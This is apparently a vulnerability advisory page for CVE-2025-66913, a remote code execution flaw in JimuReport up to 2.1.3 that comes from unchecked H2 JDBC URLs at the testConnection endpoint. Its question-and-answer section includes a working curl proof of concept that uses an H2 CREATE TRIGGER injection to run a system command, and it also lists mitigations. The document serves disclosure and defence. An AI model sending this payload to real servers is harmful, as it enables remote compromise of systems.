CVE-2025-66913
Remote Code Execution in JimuReport via H2 JDBC URL
Publication date: 2026-01-08
Last updated on: 2026-01-08
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| jeecgboot | jimureport | 2.1.3 |
| jeecgboot | jimureport | to 2.1.3 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability in JimuReport versions up to 2.1.3 allows remote code execution because the application does not properly validate user-supplied H2 JDBC URLs. Specifically, the `/jmreport/testConnection` API endpoint accepts a JDBC URL parameter that is passed directly to the H2 database driver. Attackers can craft malicious JDBC URLs using H2 directives like `INIT` or `CREATE TRIGGER` to execute arbitrary Java code on the server, such as running system commands. This occurs due to the lack of input sanitization, enabling attackers to exploit the H2 database's trigger mechanism for remote code execution. [1, 2]
How can this vulnerability impact me? :
This vulnerability can have severe impacts as it allows remote attackers to execute arbitrary code on the server running JimuReport. This means attackers could run any commands or code with the same privileges as the application, potentially leading to full system compromise, data theft, service disruption, or further attacks within the network. The CVSS score of 9.8 indicates a critical severity with high impact on confidentiality, integrity, and availability. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring or testing the `/jmreport/testConnection` API endpoint for improper validation of the `dbUrl` parameter. A practical detection method is to send a crafted POST request to this endpoint with a JSON payload specifying the database type as H2 and including a malicious JDBC URL that attempts to execute a harmless command (e.g., launching calculator). For example, you can use curl to send a POST request with a payload like: ```curl -X POST https://<target>/jmreport/testConnection -H 'Content-Type: application/json' -d '{"dbType":"H2","dbDriver":"org.h2.Driver","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER UNAM4 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ void UNAM4() throws Exception{ Runtime.getRuntime().exec(\"cmd /c calc\"); }$$","dbUsername":"","dbPassword":""}'``` If the server executes the command or responds without validation errors, the vulnerability is present. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include: 1. Restrict or disable access to the `/jmreport/testConnection` API endpoint to prevent untrusted users from sending malicious JDBC URLs. 2. Apply input validation and sanitization on the `dbUrl` parameter to block JDBC URLs containing `INIT`, `CREATE TRIGGER`, or other potentially dangerous directives. 3. Upgrade jimureport to a version later than 2.1.3 where this vulnerability is fixed, if available. 4. Monitor and audit logs for suspicious activity involving the `/jmreport/testConnection` endpoint. 5. If upgrading is not immediately possible, consider implementing network-level controls such as firewall rules to limit access to the vulnerable endpoint. [1, 2]